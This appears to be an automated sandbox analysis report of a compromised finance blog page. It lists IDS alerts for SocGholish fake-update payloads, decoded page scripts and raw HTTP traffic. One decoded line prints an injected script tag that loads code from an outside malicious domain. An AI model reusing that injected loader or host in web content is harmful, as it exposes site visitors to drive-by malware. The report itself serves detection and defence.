Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://alphaarchitect.com/2024/12/long-term-expected-returns/

Overview

General Information

Sample URL:https://alphaarchitect.com/2024/12/long-term-expected-returns/
Analysis ID:1578803
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTML title does not match URL
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 1012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1972,i,15189473384980414262,1618065118373367696,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://alphaarchitect.com/2024/12/long-term-expected-returns/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-20T13:45:09.552882+010020221121Exploit Kit Activity Detected192.168.2.449936162.159.140.229443TCP
2024-12-20T13:45:09.678638+010020221121Exploit Kit Activity Detected192.168.2.449937104.244.42.3443TCP
2024-12-20T13:45:16.363411+010020221121Exploit Kit Activity Detected192.168.2.44996634.111.113.62443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-20T13:45:25.078527+010028529001A Network Trojan was detected62.60.154.114443192.168.2.449984TCP
2024-12-20T13:45:29.842218+010028529001A Network Trojan was detected62.60.154.114443192.168.2.449987TCP

Click to jump to signature section

Show All Signature Results
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Total embedded image size: 100994
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Base64 decoded: <html><head></head><body><script src='https://pluralism.themancav.com/ijOKmPER6fHuEbCqvAemuvlH7+ioCaj0613u8eRU1f7jX++6phH4urAR+uDlWajl'></script></body></html>
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,CgkJCXZhciBkb2MgPSBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQ7CgkJCWRvYy5zZXRBdHRyaWJ1dGUoICdkYXRhLXVzZXJhZ2VudCcsIG5hdmlnYXRvci51c2VyQWdlbnQgKTsKCQk=
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,CiAgd2luZG93LmRhdGFMYXllciA9IHdpbmRvdy5kYXRhTGF5ZXIgfHwgW107CiAgZnVuY3Rpb24gZ3RhZygpe2RhdGFMYXllci5wdXNoKGFyZ3VtZW50cyk7fQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7CgogIGd0YWcoJ2NvbmZpZycsICdHLURKMEhXQzBEMksnKTsK
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,CiFmdW5jdGlvbihlLHQsbixzLHUsYSl7ZS50d3F8fChzPWUudHdxPWZ1bmN0aW9uKCl7cy5leGU/cy5leGUuYXBwbHkocyxhcmd1bWVudHMpOnMucXVldWUucHVzaChhcmd1bWVudHMpOwp9LHMudmVyc2lvbj0nMS4xJyxzLnF1ZXVlPVtdLHU9dC5jcmVhdGVFbGVtZW50KG4pLHUuYXN5bmM9IT
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCkgewoJd2luZG93Lm1jNHdwID0gd2luZG93Lm1jNHdwIHx8IHsKCQlsaXN0ZW5lcnM6IFtdLAoJCWZvcm1zOiB7CgkJCW9uOiBmdW5jdGlvbihldnQsIGNiKSB7CgkJCQl3aW5kb3cubWM0d3AubGlzdGVuZXJzLnB1c2goCgkJCQkJewoJCQkJCQlldmVudCAgIDogZXZ0LAoJCQ
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwoKKGZ1bmN0aW9uKCkgewoJdmFyIGRyb3Bkb3duID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoICJjYXQiICk7CglmdW5jdGlvbiBvbkNhdENoYW5nZSgpIHsKCQlpZiAoIGRyb3Bkb3duLm9wdGlvbnNbIGRyb3Bkb3duLnNlbGVjdGVkSW5kZXggXS52YWx1ZSA+ID
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCkgewoJd2luZG93Lm1jNHdwID0gd2luZG93Lm1jNHdwIHx8IHsKCQlsaXN0ZW5lcnM6IFtdLAoJCWZvcm1zOiB7CgkJCW9uOiBmdW5jdGlvbihldnQsIGNiKSB7CgkJCQl3aW5kb3cubWM0d3AubGlzdGVuZXJzLnB1c2goCgkJCQkJewoJCQkJCQlldmVudCAgIDogZXZ0LAoJCQ
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCkgewoJd2luZG93Lm1jNHdwID0gd2luZG93Lm1jNHdwIHx8IHsKCQlsaXN0ZW5lcnM6IFtdLAoJCWZvcm1zOiB7CgkJCW9uOiBmdW5jdGlvbihldnQsIGNiKSB7CgkJCQl3aW5kb3cubWM0d3AubGlzdGVuZXJzLnB1c2goCgkJCQkJewoJCQkJCQlldmVudCAgIDogZXZ0LAoJCQ
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCkge2Z1bmN0aW9uIG1heWJlUHJlZml4VXJsRmllbGQgKCkgewogIGNvbnN0IHZhbHVlID0gdGhpcy52YWx1ZS50cmltKCkKICBpZiAodmFsdWUgIT09ICcnICYmIHZhbHVlLmluZGV4T2YoJ2h0dHAnKSAhPT0gMCkgewogICAgdGhpcy52YWx1ZSA9ICdodHRwOi8vJyArIHZhbH
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,CiAgICAgICAgICAgIAoJCQkJCWZ1bmN0aW9uIHBmVHJhY2tFdmVudCh0aXRsZSkgewoJCQkJCQkKICAgICAgICAgICAgICAgICAgICAgICAgaWYodHlwZW9mKF9nYXEpID09PSAnZnVuY3Rpb24nKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBfZ2FxLnB1c2goWydfdHJhY2tFdmVudC
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,CigoKT0+eyd1c2Ugc3RyaWN0JztsZXQgbG9hZGVkPSExLHNjcm9sbGVkPSExLHRpbWVySWQ7ZnVuY3Rpb24gbG9hZCgpe2lmKGxvYWRlZCl7cmV0dXJufQpsb2FkZWQ9ITA7Y2xlYXJUaW1lb3V0KHRpbWVySWQpO3dpbmRvdy5yZW1vdmVFdmVudExpc3RlbmVyKCd0b3VjaHN0YXJ0Jyxsb2FkKT
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp3cC5pMThuLnNldExvY2FsZURhdGEoIHsgJ3RleHQgZGlyZWN0aW9uXHUwMDA0bHRyJzogWyAnbHRyJyBdIH0gKTsKLyogXV0+ICovCg==
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Script src: data:text/javascript;base64,CgkJCWpRdWVyeSggd2luZG93ICkub24oICdsb2FkJywgZnVuY3Rpb24oKSB7CgkJCQlqUXVlcnkoJ2lucHV0W25hbWU9InVtX3JlcXVlc3QiXScpLnZhbCgnJyk7CgkJCX0pOwoJCQ==
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: Title: Long-term expected returns: what the best way to forecast? does not match URL
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: No favicon
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: No favicon
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: No favicon
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: No favicon
Source: https://alphaarchitect.com/2024/12/long-term-expected-returns/HTTP Parser: No <meta name="copyright".. found

Networking

barindex
Source: Network trafficSuricata IDS: 2852900 - Severity 1 - ETPRO EXPLOIT_KIT SocGholish Stage 3 Fake Update Payload M3 : 62.60.154.114:443 -> 192.168.2.4:49984
Source: Network trafficSuricata IDS: 2852900 - Severity 1 - ETPRO EXPLOIT_KIT SocGholish Stage 3 Fake Update Payload M3 : 62.60.154.114:443 -> 192.168.2.4:49987
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:49936 -> 162.159.140.229:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:49937 -> 104.244.42.3:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:49966 -> 34.111.113.62:443
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /2024/12/long-term-expected-returns/ HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.woff HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://alphaarchitect.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-regular-400.woff2 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://alphaarchitect.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://alphaarchitect.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /buttons/printfriendly-pdf-button-nobg-md.png HTTP/1.1Host: cdn.printfriendly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/12/santa-logo-e1577124084176.png HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/hcaptcha-for-forms-and-more/assets/images/hcaptcha-div-logo.svg HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.requestAnimationFrame.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /buttons/printfriendly-pdf-button-nobg-md.png HTTP/1.1Host: cdn.printfriendly.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.easing.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fitvids.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/12/santa-logo-e1577124084176.png HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.ilightbox.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.requestAnimationFrame.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.mousewheel.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
